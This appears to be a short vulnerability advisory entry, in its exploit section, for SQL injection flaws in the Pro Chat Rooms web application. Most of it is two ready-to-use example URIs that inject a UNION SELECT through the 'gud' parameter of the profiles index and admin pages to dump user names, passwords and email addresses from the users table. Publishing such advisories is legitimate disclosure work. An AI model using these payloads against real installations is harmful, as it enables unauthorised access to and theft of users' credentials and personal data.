• info
• discussion
• exploit
• solution
• references

Pro Chat Rooms Multiple SQL Injection Vulnerabilities

Attackers can use a browser to exploit these issues.

The following example URIs are available:

http://www.example.com/[installdir]/profiles/index.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*

http://www.example.com/[installdir]/profiles/admin.php?gud=-1'+union+select+1,concat_ws(0x3a,user_name,password,email),3,4,5,6,7,8+from+prochatrooms_users/*